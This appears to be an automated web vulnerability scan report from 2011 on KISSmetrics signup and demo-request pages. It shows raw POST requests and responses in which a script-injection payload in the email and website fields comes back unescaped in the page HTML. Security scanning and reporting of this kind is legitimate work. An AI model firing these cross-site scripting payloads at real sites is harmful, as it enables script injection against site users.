<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup" method="post" id="signup_form"> <input name="trp" value="30" type="hidden"/> <h3>KISSmetrics free trial sign up</h3> <p>You are only a few steps away from starting your free KISSmetrics trial. Create an account name and password and you&rsquo;ll be all set.</p> <hr class="thin" /> <fieldset> <p> <label for="your_name">Your name:</label> <input class="text" name="account[meta][name]" value="Smith" id="your_name" type="text"/> </p> <p class="half"> <label for="account_name">Company name:</label> <input class="text" name="account[name]" value="Smith" id="account_name" type="text"/> </p> <p class="half"> <label for="account[meta][company_size]">Company size:</label> <select name="account[meta][company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="account[meta][url]">Company Website:</label> <input type="text" class="text" name="account[meta][url]" value="'"--></style></script><script>netsparker(0x0004E9)</script>" /> </p> <p class="half"> <label for="email">Email address:</label> <input class="text" name="user[login]" value="3" id="email" type="text"/> <span class="error">E-mail does not appear to be valid</span> </p> <p class="half"> <label for="account[meta][phone]">Telephone number:</label> <input class="text" name="account[meta][phone]" value="3" type="text"/> </p> <p class="clear"> <label for="password">Password:</label> <input class="text" name="user[new_password]" value="" id="new_password" type="password"/> <span class="error">New password must be at least 5 chars</span> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#signup_form').submit();} return false" class="blue button with_arrow">Create my account</a> <span class="note">By clicking the button above, you are agreeing with our <a href="/terms" target="_blank">Terms</a>.</span> </p> </fieldset> </form></div><!-- /.col --><div class="trial col side"> <p>Does your site have a huge number of active customers? Congratulations! We can handle it. KISSmetrics is already serving a number of customers who are sending us the actions of millions of people per day. <a href="/signup/enterprise">Contact us for more information.</a></p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login&..
- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5bfirst_name%5d POST Smith
request%5blast_name%5d POST Smith
request%5bcompany%5d POST 3
request%5bcompany_size%5d POST 1 to 5 people
request%5burl%5d POST 3
request%5bemail%5d POST '"--></style></script><script>alert(0x000674)</script>
request%5bphone%5d POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 266
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5bfirst_name%5d=Smith&request%5blast_name%5d=Smith&request%5bcompany%5d=3&request%5bcompany_size%5d=1+to+5+people&request%5burl%5d=3&request%5bemail%5d='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000674)%3c%2fscript%3e&request%5bphone%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:00:26 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people" selected="selected">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'"--></style></script><script>netsparker(0x000674)</script>" /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protoco..
- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5Bfirst_name%5D POST Smith
request%5Blast_name%5D POST Smith
request%5Bcompany%5D POST 3
request%5Burl%5D POST 3
request%5Bemail%5D POST '"--></style></script><script>alert(0x0006BD)</script>
request%5Bphone%5D POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 226
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5Bfirst_name%5D=Smith&request%5Blast_name%5D=Smith&request%5Bcompany%5D=3&request%5Burl%5D=3&request%5Bemail%5D='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006BD)%3c%2fscript%3e&request%5Bphone%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:01:11 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'"--></style></script><script>netsparker(0x0006BD)</script>" /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the 